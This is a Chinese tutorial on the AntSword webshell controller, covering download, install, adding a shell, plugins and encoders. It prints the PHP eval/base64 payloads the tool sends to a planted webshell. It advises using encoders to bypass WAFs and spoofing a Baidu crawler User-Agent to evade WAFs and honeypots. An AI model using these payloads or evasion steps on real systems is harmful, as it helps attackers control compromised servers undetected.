中國蟻劍是一款開源的跨平臺網站管理工具,它主要面向於合法授權的滲透測試安全人員以及進行常規操作的網站管理員。
通俗的講:中國蟻劍是 一 款比菜刀還牛的shell控制端軟件。
中國蟻劍推崇模塊化的開發思想,遵循開源,就要開得漂亮的原則,致力於爲不同層次的人羣提供最簡單易懂、方便直接的代碼展示及其修改說明,努力讓大家可以一起爲這個項目貢獻出力所能及的點滴,讓這款工具真正能讓大家用得順心、舒適,讓它能爲大家施展出最人性化最適合你的能力!
一、中國蟻劍下載
唯一官方github下載地址:https://github.com/AntSwordProject/
注意:我們下載的時候需要下載兩個部分,一個是項目核心源碼”antSword“,另一個是加載器;加載器則分爲三個版本:Mac、Windows、Linux。
二、中國蟻劍安裝
由於我下載的是“AntSword-Loader-v4.0.3-win32-x64.zip”,我就以Windows版本64位來示例了。
1、我們解壓“AntSword-Loader-v4.0.3-win32-x64.zip”後,雙擊“AntSword.exe”;
第一次安裝項目需要先初始化,如果你已經下載了核心源碼,就選擇項目源碼的文件夾。(如果只下載了加載器,選擇一個空文件夾,加載器會自動幫你下載核心項目源碼)。
注意:這個項目文件夾就是你以後需要備份的,存儲着你的shell和shell內的資料。
2、等初始化完成後,再雙擊“AntSword.exe”即可正常啓動!
三、中國蟻劍使用
使用其實跟菜刀幾乎差不多,只是蟻劍功能更強大一些,下面就簡單給大家說說:
1、添加一個shell
首先:右鍵單擊 - 添加數據;
其次:輸入URL地址,連接密碼以及編碼設置。PHP語言推薦編輯器使用chr加密;
再次:如果需要自己寫編碼器的加密類型,可以按下圖來操作:
從次:還可以配置shell的請求信息和post內容;
最後:還可以配置全局代理;
2、插件
中國蟻劍有一個插件市場,可以安裝一些插件,插件有很多。以下是部份插件截圖:
3、關於編碼器
編碼器是這個程序的過人之處,用編碼器加密可以輕鬆繞過WAF。
不妨,我們來對比一下默認不使用編碼傳輸和base64編碼傳輸的區別:
明文傳輸,post內容爲:
ant=@ini_set("display_errors", "0");@set_time_limit(0);echo "3e231";$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D} ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.=" ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.=" {$s}";echo $R;;echo "8e51f";die();
base64加密傳輸,post內容爲:
_0x4ee8506e59871=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZWNobyAiNzk1ODAiOyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk/QHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk/JHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOztlY2hvICIwOWE3ZSI7ZGllKCk7&ant=@eval(@base64_decode($_POST[_0x4ee8506e59871]));
注意:其中,ant參數名稱是shell密碼。
再來看看chr編碼傳輸,完全就全部編碼了。
4、user-agent修改
要注意的是,軟件默認的user-agent是:User-Agent: antSword/v2.0;而且大部分人都不會去自定義useragent,這就給waf和蜜罐白白送了一個特徵,所以我們要修改一下源代碼:
修改項目路徑:
antSword\modules\request.js (修改const USER_AGENT = 'antSword/v2.1'; 這一行代碼!)
antSword\modules\update.js (有兩處要修改;可搜索“antSword/v2.0”來找到這兩行代碼!)
我這裏是把antSword/v2.0或antSword/v2.1修改爲了Baiduspider-image,百度圖片蜘蛛;
如果大家還有什麼不懂的,請查看中文說明書:https://doc.u0u.us/zh-hans/